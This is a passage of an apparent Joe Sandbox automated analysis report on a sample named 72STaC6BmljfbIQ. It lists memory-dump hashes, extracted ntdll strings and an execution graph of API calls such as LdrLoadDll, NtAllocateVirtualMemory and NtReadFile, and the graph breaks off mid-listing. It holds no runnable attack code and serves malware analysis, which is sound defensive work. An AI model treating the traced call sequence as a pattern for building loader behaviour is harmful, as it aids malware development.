                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 43352d59d462a3a7cb4366a31fb4e8b2b6e55e2f60afc1459e92890d3fb069dd
                                                                                                      • Instruction ID: d8aa717e2d926e52fe640daefae7341d57deb02b0458d934e06a0f39e246aec9
                                                                                                      • Opcode Fuzzy Hash: 43352d59d462a3a7cb4366a31fb4e8b2b6e55e2f60afc1459e92890d3fb069dd
                                                                                                      • Instruction Fuzzy Hash: FF90023520181402D10471584908747001597D0302F55C011E5165555EC765C9916632
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cb9d6fee9a5037a0819eeec524b824bcf9d87e16631c0b0e74c0af549e8d68c1
                                                                                                      • Instruction ID: 8e9511a4480ca6875ac8a8d501e615d84110705e92635337489473cad477fe27
                                                                                                      • Opcode Fuzzy Hash: cb9d6fee9a5037a0819eeec524b824bcf9d87e16631c0b0e74c0af549e8d68c1
                                                                                                      • Instruction Fuzzy Hash: 9F900225211C1042D20475684D14B07001597D0303F55C115E0155554CCA1589615622
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9c16a259b5507832d746b5abb34e01aba59367ad42b07fa6b868ffdc379a6234
                                                                                                      • Instruction ID: db19ff05ecca9f4e0243c14d4cf6b9d5bf3ed311d110ee75f629bd36535b7433
                                                                                                      • Opcode Fuzzy Hash: 9c16a259b5507832d746b5abb34e01aba59367ad42b07fa6b868ffdc379a6234
                                                                                                      • Instruction Fuzzy Hash: 4390022530141402D106715845146060019D7D1345F95C012E1425555DC7258A53A233
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2b06ac1765d63d900840d8716866a092bdf3960384e665c377355681771c2c7d
                                                                                                      • Instruction ID: f0780229645441a97bce7bdc9690725d92ec76667d63c42cd9b8a46ee411b633
                                                                                                      • Opcode Fuzzy Hash: 2b06ac1765d63d900840d8716866a092bdf3960384e665c377355681771c2c7d
                                                                                                      • Instruction Fuzzy Hash: 6C90022560141502D10571584504616001A97D0241F95C022E1025555ECB258A92A232
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 323bac5bf558bddd9392d0479da572adeee7e556daebebe8248ad39427bd54b1
                                                                                                      • Instruction ID: 032d6e2ca38e5617af15e95b08155fa38eef7bcbe7e6c03c12b311794a30b891
                                                                                                      • Opcode Fuzzy Hash: 323bac5bf558bddd9392d0479da572adeee7e556daebebe8248ad39427bd54b1
                                                                                                      • Instruction Fuzzy Hash: 6190047530141403D144715C45047470015D7D0301F55C011F5075554FC75DCFD57777
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7187245e8c0f558cef8e482d379e714a9aef57ef9ab433178f88161db8a46890
                                                                                                      • Instruction ID: 9940581e97fd847cc0ed2ebbb24305afd6386be4a3a0a295363154460ccd7293
                                                                                                      • Opcode Fuzzy Hash: 7187245e8c0f558cef8e482d379e714a9aef57ef9ab433178f88161db8a46890
                                                                                                      • Instruction Fuzzy Hash: A790026520181403D14475584904607001597D0302F55C011E2065555ECB298D516236
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2e9f8cc82dbf0efbf691f5e033580f0fe3cb39431088545d19b5560c8c31db96
                                                                                                      • Instruction ID: 1b7b9813fbbdc18c88761979190edde1d944bb53257e3371c2ac896b6d60f9e6
                                                                                                      • Opcode Fuzzy Hash: 2e9f8cc82dbf0efbf691f5e033580f0fe3cb39431088545d19b5560c8c31db96
                                                                                                      • Instruction Fuzzy Hash: 7390022520185442D14472584904B0F411597E1202F95C019E4157554CCA1589555722
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6560ecfbad82887250e814766aefd24534171d3aa740682cded4691952fa302d
                                                                                                      • Instruction ID: bd1099dd4435e66a2bef9a4ada460972d153ea4689f3cecd4699aef5bb619023
                                                                                                      • Opcode Fuzzy Hash: 6560ecfbad82887250e814766aefd24534171d3aa740682cded4691952fa302d
                                                                                                      • Instruction Fuzzy Hash: DD90022524141802D144715885147070016D7D0601F55C011E0025554DC7168A6567B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f6424d39d4392a68220fc6af12ca7e5806cd5f6bd8f8b809c275f8e0fd2afcdf
                                                                                                      • Instruction ID: ecc817c627578f221261662e3fa6203cd068ff23c91c73d84d64de36973240b3
                                                                                                      • Opcode Fuzzy Hash: f6424d39d4392a68220fc6af12ca7e5806cd5f6bd8f8b809c275f8e0fd2afcdf
                                                                                                      • Instruction Fuzzy Hash: 7290043534547103D154715C45047174015F7F0301F55C031F0C155D4DC755CD557333
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8c3a5f0306769cbdc1c22f0ed0845af2324757a1c3c998fb01634019bb3b47c7
                                                                                                      • Instruction ID: edd5042e6fb6371ebcfe42e05c16972df5c8722b9774e8386485b62c19d87b68
                                                                                                      • Opcode Fuzzy Hash: 8c3a5f0306769cbdc1c22f0ed0845af2324757a1c3c998fb01634019bb3b47c7
                                                                                                      • Instruction Fuzzy Hash: 7F90023520241142954472585904A4E411597E1302B95D415E0016554CCA1489615322
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cd2b6c88719ec287d9975dfefc02c72eda24b60758746ac36cc315085171d2d8
                                                                                                      • Instruction ID: 6f73ef49ce9d53d01c67d3e4f58e21328f58e6c142e06d3458fd1e2416deaf46
                                                                                                      • Opcode Fuzzy Hash: cd2b6c88719ec287d9975dfefc02c72eda24b60758746ac36cc315085171d2d8
                                                                                                      • Instruction Fuzzy Hash: B990023920141402D51471585904646005697D0301F55D411E0425558DC75489A1A222
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction ID: f50c2a332d6ecf4a94890fbdc1e7e8f755e852d62214f9b67cbc070c094e8110
                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: c928e2873c7a2ed13ca5cd9e69a7e2b10c8cb5b25def5355a3dbe0bd126fd025
                                                                                                      • Instruction ID: a369943c0c5a74da8e2e1fefda9b861909551b2629d43a39712f10650fcaf4e0
                                                                                                      • Opcode Fuzzy Hash: c928e2873c7a2ed13ca5cd9e69a7e2b10c8cb5b25def5355a3dbe0bd126fd025
                                                                                                      • Instruction Fuzzy Hash: 1751E7B5A00126BFDB19DB9C889097EFBF8BF18640B14C12DF569D7641E374DE4087A0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: 46c026aafeca55f9c61a0d7a3ff64980f567a991c31b74778e6d7782a5d053f1
                                                                                                      • Instruction ID: cbe1893ea627eeb02f4676228a87ee45f8a1df044b36a49739005667009088cf
                                                                                                      • Opcode Fuzzy Hash: 46c026aafeca55f9c61a0d7a3ff64980f567a991c31b74778e6d7782a5d053f1
                                                                                                      • Instruction Fuzzy Hash: BD5119B1A10646EECB38DF5CC89097FB7F8EF88200B448559E6D6D7681D7B4EA40C760
                                                                                                      Strings
                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011F4655
                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 011F4787
                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011F46FC
                                                                                                      • ExecuteOptions, xrefs: 011F46A0
                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011F4725
                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011F4742
                                                                                                      • Execute=1, xrefs: 011F4713
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                      • API String ID: 0-484625025
                                                                                                      • Opcode ID: adc28a5336ab2bb357234ed6d85dc1152cf60d02030d1956bbf63129a4f831fc
                                                                                                      • Instruction ID: e98d55b95007f403fbe6ef2e5358a47b5e0079b0a13655b731bcf580d99a8546
                                                                                                      • Opcode Fuzzy Hash: adc28a5336ab2bb357234ed6d85dc1152cf60d02030d1956bbf63129a4f831fc
                                                                                                      • Instruction Fuzzy Hash: 51513931A002197AEF2DABA8ECD9FFE77A8AF98704F04019DD605A71C1E7719A418F51
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-$0$0
                                                                                                      • API String ID: 1302938615-699404926
                                                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                      • Instruction ID: 802d2273c66ed54bf74238e9f6b9068f91ebff6420fdc5118e43c5edf3778748
                                                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                      • Instruction Fuzzy Hash: D081A070E092599EEF2D8EACC8527FEBBB1AF65BA0F18411DD851E72D1C7348840CB59
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                      • API String ID: 48624451-2819853543
                                                                                                      • Opcode ID: 094a33a492c6c47f4dc24acc6ffdf382112ff50819ecea5403f4d65cea6a2988
                                                                                                      • Instruction ID: 711b3bcae142224257ff337682654c744e877b20df3cb5642e44ba5be12cc516
                                                                                                      • Opcode Fuzzy Hash: 094a33a492c6c47f4dc24acc6ffdf382112ff50819ecea5403f4d65cea6a2988
                                                                                                      • Instruction Fuzzy Hash: C52167B6A1011AABDB14DF79DD44AEEBBF8EF94644F040119EA45E3201E731DA018BE1
                                                                                                      Strings
                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011F02BD
                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011F02E7
                                                                                                      • RTL: Re-Waiting, xrefs: 011F031E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                      • API String ID: 0-2474120054
                                                                                                      • Opcode ID: 42f2ac342969890b2b4bc607886b77f1c831c47e9a1b9ea8f317dc04004a5ca7
                                                                                                      • Instruction ID: 00fa435888f7e959e83dee6f8eae194e1a83379cb4cceb3159fe4267e7967a6b
                                                                                                      • Opcode Fuzzy Hash: 42f2ac342969890b2b4bc607886b77f1c831c47e9a1b9ea8f317dc04004a5ca7
                                                                                                      • Instruction Fuzzy Hash: C6E1BF746087429FD72DCF28C884B2ABBE1FB88714F540A1DF6A58B2D2D774D845CB52
                                                                                                      Strings
                                                                                                      • RTL: Resource at %p, xrefs: 011F7B8E
                                                                                                      • RTL: Re-Waiting, xrefs: 011F7BAC
                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011F7B7F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 0-871070163
                                                                                                      • Opcode ID: e5fa16415fc473cdeb544d2d61a761fc6a135292d1ef25e1a8f008593757cdc4
                                                                                                      • Instruction ID: 5c5cfed05af177d0dc334640eb7f457773d92891b0729f6265a0d04c212356ab
                                                                                                      • Opcode Fuzzy Hash: e5fa16415fc473cdeb544d2d61a761fc6a135292d1ef25e1a8f008593757cdc4
                                                                                                      • Instruction Fuzzy Hash: A54107313097069FD729DE29CC80BAAB7E5EF99710F000A1DFA56D7A80DB31E405CB96
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011F728C
                                                                                                      Strings
                                                                                                      • RTL: Resource at %p, xrefs: 011F72A3
                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011F7294
                                                                                                      • RTL: Re-Waiting, xrefs: 011F72C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 885266447-605551621
                                                                                                      • Opcode ID: 7308da1af4438eb1f82457badef00f86faa89cae1540024a96d7b0cd324f46d6
                                                                                                      • Instruction ID: 919164c72430e2276c44571b48d1af31ef7705077e998ee417b47e6c1f39d233
                                                                                                      • Opcode Fuzzy Hash: 7308da1af4438eb1f82457badef00f86faa89cae1540024a96d7b0cd324f46d6
                                                                                                      • Instruction Fuzzy Hash: F141F035608602AFD729DE29CC81FAAB7A5FB94710F10061DFA56AB680DB31E812C7D5
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$]:%u
                                                                                                      • API String ID: 48624451-3050659472
                                                                                                      • Opcode ID: 1760823b2f64c3d6d9086654b79ae05be0c998bdbf546a7aba4414aa1039daaa
                                                                                                      • Instruction ID: baa5a718e657b6002d7d6f2ef0df309000360e820d6575f1bb6d22cb18514813
                                                                                                      • Opcode Fuzzy Hash: 1760823b2f64c3d6d9086654b79ae05be0c998bdbf546a7aba4414aa1039daaa
                                                                                                      • Instruction Fuzzy Hash: 42317872A1021ADFDB24DF2DDC40BEEB7F8EF54610F544559E949E3240EB30AA459BA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-
                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                      • Instruction ID: 652ef2780f8fae74a4b97a62eb2a6249f51033804ea5d8b4fafc4c1c20b919dd
                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                      • Instruction Fuzzy Hash: 7291A671E002169BDB2CDF6DC8C16BEBBA5AF64B20F14451EE965E72C0D7B08941CF52
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$@
                                                                                                      • API String ID: 0-1194432280
                                                                                                      • Opcode ID: 5468bd9e8881d52c6103ec385dfdc3031f41674d3ee416c8cd1f3019e302b637
                                                                                                      • Instruction ID: c21129b17db58b0998d3adf72c89bda28b2b6009761f87beaa8973be2c8b94ea
                                                                                                      • Opcode Fuzzy Hash: 5468bd9e8881d52c6103ec385dfdc3031f41674d3ee416c8cd1f3019e302b637
                                                                                                      • Instruction Fuzzy Hash: 6A812E71D006699BDB39DB94CC44BEEB7B8AF48714F0041DAEA19B7240D7705E84CFA0
                                                                                                      APIs
                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0120CFBD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallFilterFunc@8
                                                                                                      • String ID: @$@4Qw@4Qw
                                                                                                      • API String ID: 4062629308-2383119779
                                                                                                      • Opcode ID: 9dba31561de1362d8fe39cf1a962e30cd376cc1f82cf4dfa5681eb5ff61de56b
                                                                                                      • Instruction ID: 7597a56dbe69ea9aada6a7299bd36970c7213a6d3ec8199614ac369c22460d34
                                                                                                      • Opcode Fuzzy Hash: 9dba31561de1362d8fe39cf1a962e30cd376cc1f82cf4dfa5681eb5ff61de56b
                                                                                                      • Instruction Fuzzy Hash: AC41D671911219DFDB26DFE9C840AAEBBB9FF54B54F00422EEA14DB295D770C801CB61

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.6%
                                                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                                                      Signature Coverage:1.5%
                                                                                                      Total number of Nodes:455
                                                                                                      Total number of Limit Nodes:73
                                                                                                      execution_graph 99508 605d60 99513 6082a0 99508->99513 99510 605d90 99512 605dbc 99510->99512 99517 608220 99510->99517 99514 6082b3 99513->99514 99524 618be0 99514->99524 99516 6082de 99516->99510 99518 608264 99517->99518 99523 608285 99518->99523 99530 6189c0 99518->99530 99520 608275 99521 608291 99520->99521 99535 619630 99520->99535 99521->99510 99523->99510 99525 618c5b 99524->99525 99526 618c08 99524->99526 99529 3022dd0 LdrInitializeThunk 99525->99529 99526->99516 99527 618c7d 99527->99516 99529->99527 99531 618a3d 99530->99531 99533 6189eb 99530->99533 99538 3024650 LdrInitializeThunk 99531->99538 99532 618a5f 99532->99520 99533->99520 99536 61964a 99535->99536 99537 619658 NtClose 99536->99537 99537->99523 99538->99532 99714 6194a0 99715 619544 99714->99715 99717 6194c8 99714->99717 99716 619557 NtReadFile 99715->99716 99718 618b20 99719 618b48 99718->99719 99720 618bac 99718->99720 99723 3022ee0 LdrInitializeThunk 99720->99723 99721 618bda 99723->99721 99539 6024e7 99540 6024f1 99539->99540 99541 60249c 99539->99541 99544 6196c0 99541->99544 99543 6024ab 99545 61974f 99544->99545 99547 6196eb 99544->99547 99549 3022e80 LdrInitializeThunk 99545->99549 99546 61977d 99546->99543 99547->99543 99549->99546 99729 60292a 99731 602963 99729->99731 99732 606460 99729->99732 99733 60646a 99732->99733 99734 6064b7 99733->99734 99739 6191c0 99733->99739 99734->99731 99736 6064da 99736->99734 99737 619630 NtClose 99736->99737 99738 60655c 99737->99738 99738->99731 99740 6191dd 99739->99740 99743 3022ca0 LdrInitializeThunk 99740->99743 99741 619206 99741->99736 99743->99741 99550 5fb6d0 99553 61b630 99550->99553 99552 5fcd41 99556 619790 99553->99556 99555 61b661 99555->99552 99557 619825 99556->99557 99559 6197bb 99556->99559 99558 619838 NtAllocateVirtualMemory 99557->99558 99558->99555 99559->99555 99560 60aef0 99565 60ac00 99560->99565 99562 60aefd 99579 60a870 99562->99579 99564 60af19 99566 60ac25 99565->99566 99590 608510 99566->99590 99569 60ad70 99569->99562 99571 60ad87 99571->99562 99572 60ad7e 99572->99571 99574 60ae75 99572->99574 99609 60a2c0 99572->99609 99576 60aeda 99574->99576 99618 60a630 99574->99618 99622 61b6c0 99576->99622 99580 60a886 99579->99580 99583 60a891 99579->99583 99581 61b7a0 RtlAllocateHeap 99580->99581 99581->99583 99582 60a8b5 99582->99564 99583->99582 99584 608510 GetFileAttributesW 99583->99584 99585 60abd2 99583->99585 99588 60a2c0 RtlFreeHeap 99583->99588 99589 60a630 RtlFreeHeap 99583->99589 99584->99583 99586 60abeb 99585->99586 99587 61b6c0 RtlFreeHeap 99585->99587 99586->99564 99587->99586 99588->99583 99589->99583 99591 608531 99590->99591 99592 608538 GetFileAttributesW 99591->99592 99593 608543 99591->99593 99592->99593 99593->99569 99594 613550 99593->99594 99595 613565 99594->99595 99596 61355e 99594->99596 99625 604700 99595->99625 99596->99572 99599 6135a9 99605 613757 99599->99605 99629 61b7a0 99599->99629 99602 6135c2 99603 61374d 99602->99603 99602->99605 99606 6135de 99602->99606 99604 61b6c0 RtlFreeHeap 99603->99604 99603->99605 99604->99605 99605->99572 99606->99605 99607 61b6c0 RtlFreeHeap 99606->99607 99608 613741 99607->99608 99608->99572 99610 60a2e6 99609->99610 99636 60dd30 99610->99636 99612 60a358 99614 60a4e0 99612->99614 99616 60a376 99612->99616 99613 60a4c5 99613->99572 99614->99613 99615 60a180 RtlFreeHeap 99614->99615 99615->99614 99616->99613 99641 60a180 99616->99641 99619 60a656 99618->99619 99620 60dd30 RtlFreeHeap 99619->99620 99621 60a6dd 99620->99621 99621->99574 99649 619980 99622->99649 99624 60aee1 99624->99562 99626 604724 99625->99626 99627 60472b 99626->99627 99628 604760 LdrLoadDll 99626->99628 99627->99599 99632 613010 LdrLoadDll 99627->99632 99628->99627 99633 619940 99629->99633 99631 61b7bb 99631->99602 99632->99599 99634 61995a 99633->99634 99635 619968 RtlAllocateHeap 99634->99635 99635->99631 99637 60dd54 99636->99637 99638 60dd61 99637->99638 99639 61b6c0 RtlFreeHeap 99637->99639 99638->99612 99640 60dda4 99639->99640 99640->99612 99642 60a19d 99641->99642 99645 60ddc0 99642->99645 99644 60a2a3 99644->99616 99646 60dde4 99645->99646 99647 60de8e 99646->99647 99648 61b6c0 RtlFreeHeap 99646->99648 99647->99644 99648->99647 99650 61999a 99649->99650 99651 6199a8 RtlFreeHeap 99650->99651 99651->99624 99652 600f70 99653 600f89 99652->99653 99654 604700 LdrLoadDll 99653->99654 99655 600fa7 99654->99655 99656 